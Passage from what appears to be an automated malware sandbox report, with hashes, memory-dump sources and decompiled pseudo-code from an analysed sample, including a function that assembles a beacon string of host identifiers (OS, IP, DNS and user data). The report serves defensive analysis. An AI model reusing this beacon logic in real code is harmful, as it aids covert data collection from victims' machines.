                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E411376915292CFC71A8F78C89A299FBB2FF0231135946CDC0839F166C7326046CB4A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
                                                                                                                                                                                                    • Instruction ID: c6c283606fbf782cc84e68cf0b82df21ac8fd1f8244c59c942aaec7c4a934cc1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8941E276915291CFD71ACF78C89A699FBB2FF0631035946CDC093AF166C322614ACB4A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627309822.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: bfa873a2c3becb02e409f1b11e12a76dece870074d9f54833bf9b0812fd4a606
                                                                                                                                                                                                    • Instruction ID: f57d31d2fe0491916672119b561d901c0c1b8b3c0faf450502d7a9667da21783
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfa873a2c3becb02e409f1b11e12a76dece870074d9f54833bf9b0812fd4a606
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8414B72A40219DFCF20CF44C880BA9B3B5FB49314F59A595D8496B626E330FAC5CF81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627309822.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1669aeed9a506f18789f514b39702e21009598b07de45d84e72983990c183d22
                                                                                                                                                                                                    • Instruction ID: dbc01525b99f1612544f69defbbdc3b4dc0bf274e1468013213636a74d36a6c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1669aeed9a506f18789f514b39702e21009598b07de45d84e72983990c183d22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA315976A40219DFDF24CF54C880BA9B7B5FF89324F189594D94A6B626D330FA80CF90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                    			E04F6B09C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                    					E04F6B207(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                    					_t49 = E04F6B2C1(_t66);
                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                    										E04F6B1AC(_t55, _t66);
                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                    										E04F6B207(_t89, _t66, 0);
                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                    										E04F6B2A3(_t82[2]);
                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x04f6b0a0
                                                                                                                                                                                                    0x04f6b0a1
                                                                                                                                                                                                    0x04f6b0a2
                                                                                                                                                                                                    0x04f6b0a5
                                                                                                                                                                                                    0x04f6b0a7
                                                                                                                                                                                                    0x04f6b0aa
                                                                                                                                                                                                    0x04f6b0ab
                                                                                                                                                                                                    0x04f6b0ad
                                                                                                                                                                                                    0x04f6b0ae
                                                                                                                                                                                                    0x04f6b0af
                                                                                                                                                                                                    0x04f6b0b2
                                                                                                                                                                                                    0x04f6b0bc
                                                                                                                                                                                                    0x04f6b16d
                                                                                                                                                                                                    0x04f6b174
                                                                                                                                                                                                    0x04f6b17d
                                                                                                                                                                                                    0x04f6b0c2
                                                                                                                                                                                                    0x04f6b0c2
                                                                                                                                                                                                    0x04f6b0c8
                                                                                                                                                                                                    0x04f6b0ce
                                                                                                                                                                                                    0x04f6b0d1
                                                                                                                                                                                                    0x04f6b0d4
                                                                                                                                                                                                    0x04f6b0d8
                                                                                                                                                                                                    0x04f6b0dd
                                                                                                                                                                                                    0x04f6b0e2
                                                                                                                                                                                                    0x04f6b162
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b0e4
                                                                                                                                                                                                    0x04f6b0e4
                                                                                                                                                                                                    0x04f6b0f0
                                                                                                                                                                                                    0x04f6b0f2
                                                                                                                                                                                                    0x04f6b14d
                                                                                                                                                                                                    0x04f6b14d
                                                                                                                                                                                                    0x04f6b153
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b0f4
                                                                                                                                                                                                    0x04f6b103
                                                                                                                                                                                                    0x04f6b105
                                                                                                                                                                                                    0x04f6b106
                                                                                                                                                                                                    0x04f6b107
                                                                                                                                                                                                    0x04f6b10a
                                                                                                                                                                                                    0x04f6b10a
                                                                                                                                                                                                    0x04f6b10c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b10e
                                                                                                                                                                                                    0x04f6b10e
                                                                                                                                                                                                    0x04f6b158
                                                                                                                                                                                                    0x04f6b110
                                                                                                                                                                                                    0x04f6b110
                                                                                                                                                                                                    0x04f6b114
                                                                                                                                                                                                    0x04f6b11c
                                                                                                                                                                                                    0x04f6b121
                                                                                                                                                                                                    0x04f6b126
                                                                                                                                                                                                    0x04f6b132
                                                                                                                                                                                                    0x04f6b13a
                                                                                                                                                                                                    0x04f6b141
                                                                                                                                                                                                    0x04f6b147
                                                                                                                                                                                                    0x04f6b14b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b14b
                                                                                                                                                                                                    0x04f6b10e
                                                                                                                                                                                                    0x04f6b10c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b0f2
                                                                                                                                                                                                    0x04f6b166
                                                                                                                                                                                                    0x04f6b166
                                                                                                                                                                                                    0x04f6b166
                                                                                                                                                                                                    0x04f6b0e2
                                                                                                                                                                                                    0x04f6b182
                                                                                                                                                                                                    0x04f6b189

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                    • Instruction ID: d00a9824e72026f71e7f852cfe4d1c983bcb317ae9e4ae48aa3e2d36aa1c2062
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2821C872900214AFDB10DF68CCC09ABBBA5FF45350B458169D916DB249E730F916CBE0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                    			E004020C4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                    					E0040222B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                    					_t49 = E004022E5(_t66);
                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                    										E004021D0(_t55, _t66);
                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                    										E0040222B(_t89, _t66, 0);
                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                    										E004022C7(_t82[2], 1);
                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                    										 *(_t82[2])();
                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x004020c8
                                                                                                                                                                                                    0x004020c9
                                                                                                                                                                                                    0x004020ca
                                                                                                                                                                                                    0x004020cd
                                                                                                                                                                                                    0x004020cf
                                                                                                                                                                                                    0x004020d2
                                                                                                                                                                                                    0x004020d3
                                                                                                                                                                                                    0x004020d5
                                                                                                                                                                                                    0x004020d6
                                                                                                                                                                                                    0x004020d7
                                                                                                                                                                                                    0x004020da
                                                                                                                                                                                                    0x004020e4
                                                                                                                                                                                                    0x00402195
                                                                                                                                                                                                    0x0040219c
                                                                                                                                                                                                    0x004021a5
                                                                                                                                                                                                    0x004020ea
                                                                                                                                                                                                    0x004020ea
                                                                                                                                                                                                    0x004020f0
                                                                                                                                                                                                    0x004020f6
                                                                                                                                                                                                    0x004020f9
                                                                                                                                                                                                    0x004020fc
                                                                                                                                                                                                    0x00402100
                                                                                                                                                                                                    0x00402105
                                                                                                                                                                                                    0x0040210a
                                                                                                                                                                                                    0x0040218a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040210c
                                                                                                                                                                                                    0x0040210c
                                                                                                                                                                                                    0x00402118
                                                                                                                                                                                                    0x0040211a
                                                                                                                                                                                                    0x00402175
                                                                                                                                                                                                    0x00402175
                                                                                                                                                                                                    0x0040217b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040211c
                                                                                                                                                                                                    0x0040212b
                                                                                                                                                                                                    0x0040212d
                                                                                                                                                                                                    0x0040212e
                                                                                                                                                                                                    0x0040212f
                                                                                                                                                                                                    0x00402132
                                                                                                                                                                                                    0x00402132
                                                                                                                                                                                                    0x00402134
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402136
                                                                                                                                                                                                    0x00402136
                                                                                                                                                                                                    0x00402180
                                                                                                                                                                                                    0x00402138
                                                                                                                                                                                                    0x00402138
                                                                                                                                                                                                    0x0040213c
                                                                                                                                                                                                    0x00402144
                                                                                                                                                                                                    0x00402149
                                                                                                                                                                                                    0x0040214e
                                                                                                                                                                                                    0x0040215a
                                                                                                                                                                                                    0x00402162
                                                                                                                                                                                                    0x00402169
                                                                                                                                                                                                    0x0040216f
                                                                                                                                                                                                    0x00402173
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402173
                                                                                                                                                                                                    0x00402136
                                                                                                                                                                                                    0x00402134
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040211a
                                                                                                                                                                                                    0x0040218e
                                                                                                                                                                                                    0x0040218e
                                                                                                                                                                                                    0x0040218e
                                                                                                                                                                                                    0x0040210a
                                                                                                                                                                                                    0x004021aa
                                                                                                                                                                                                    0x004021b1

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                    • Instruction ID: deb3b98fa59a2412115f4a835ef9ec47523564a76a5fec3dc64d7b64d28707d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821C432900204ABCB10EF69CDC49A7BBA5BF48350B4585AAED15AB2C5D774F915CBE0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627309822.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                                                                                                                                                                                    • Instruction ID: 48ecb0119360c2cf02584a7dd325e82a54f0792c686e397cc8a67155876b7d7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B1A00118EEEF15CA40CC40FF6B7BDEBC9700F0481D6A60CAA150D6306E848F60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627309822.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                                                                                                                                                                                    • Instruction ID: 7c321e857678a9e2bf2c754cec00bd891a5739e571f7b4306e8e1acf230377ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87D09235E0026C9FCF20CA50C910BAAF3B2BF8A354F5510C9E8083721187303E82CE51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                    			E04F61D4C(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				int _t80;
                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                    				int _t84;
                                                                                                                                                                                                    				intOrPtr _t86;
                                                                                                                                                                                                    				int _t89;
                                                                                                                                                                                                    				intOrPtr* _t92;
                                                                                                                                                                                                    				intOrPtr* _t93;
                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				int _t104;
                                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t98 = __edx;
                                                                                                                                                                                                    				_t94 = __ecx;
                                                                                                                                                                                                    				_t26 = __eax;
                                                                                                                                                                                                    				_t108 = _a16;
                                                                                                                                                                                                    				_v4 = 8;
                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                    					_t26 = GetTickCount();
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t27 =  *0x4f6d018; // 0x1b60b74c
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t28 =  *0x4f6d014; // 0x3a87c8cd
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t29 =  *0x4f6d010; // 0xd8d2f808
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t30 =  *0x4f6d00c; // 0x8f8f86c2
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t31 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t3 = _t31 + 0x4f6e633; // 0x74666f73
                                                                                                                                                                                                    				_t104 = wsprintfA(_t108, _t3, 2, 0x3d13b, _t30, _t29, _t28, _t27,  *0x4f6d02c,  *0x4f6d004, _t26);
                                                                                                                                                                                                    				_t34 = E04F66B47();
                                                                                                                                                                                                    				_t35 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t4 = _t35 + 0x4f6e673; // 0x74707526
                                                                                                                                                                                                    				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                                                                                                                                                                                    				_t111 = _t109 + 0x38;
                                                                                                                                                                                                    				_t105 = _t104 + _t38;
                                                                                                                                                                                                    				_t99 = E04F66111(_t94);
                                                                                                                                                                                                    				if(_t99 != 0) {
                                                                                                                                                                                                    					_t86 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t6 = _t86 + 0x4f6e8eb; // 0x736e6426
                                                                                                                                                                                                    					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                                                                                                                                                                                    					_t111 = _t111 + 0xc;
                                                                                                                                                                                                    					_t105 = _t105 + _t89;
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _t99);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t100 = E04F626A0();
                                                                                                                                                                                                    				if(_t100 != 0) {
                                                                                                                                                                                                    					_t81 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t8 = _t81 + 0x4f6e8f3; // 0x6f687726
                                                                                                                                                                                                    					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                                                                                                                                                                                    					_t111 = _t111 + 0xc;
                                                                                                                                                                                                    					_t105 = _t105 + _t84;
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _t100);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t101 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				_a32 = E04F61B77(0x4f6d00a, _t101 + 4);
                                                                                                                                                                                                    				_t43 =  *0x4f6d2cc; // 0x0
                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                    					_t77 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t11 = _t77 + 0x4f6e8cd; // 0x3d736f26
                                                                                                                                                                                                    					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                                                                                                                                                                                    					_t111 = _t111 + 0xc;
                                                                                                                                                                                                    					_t105 = _t105 + _t80;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t44 =  *0x4f6d2c8; // 0x0
                                                                                                                                                                                                    				if(_t44 != 0) {
                                                                                                                                                                                                    					_t74 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t13 = _t74 + 0x4f6e8c6; // 0x3d706926
                                                                                                                                                                                                    					wsprintfA(_t105 + _t108, _t13, _t44);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a32 != 0) {
                                                                                                                                                                                                    					_t103 = RtlAllocateHeap( *0x4f6d238, 0, 0x800);
                                                                                                                                                                                                    					if(_t103 != 0) {
                                                                                                                                                                                                    						E04F61BE3(GetTickCount());
                                                                                                                                                                                                    						_t51 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    						__imp__(_t51 + 0x40);
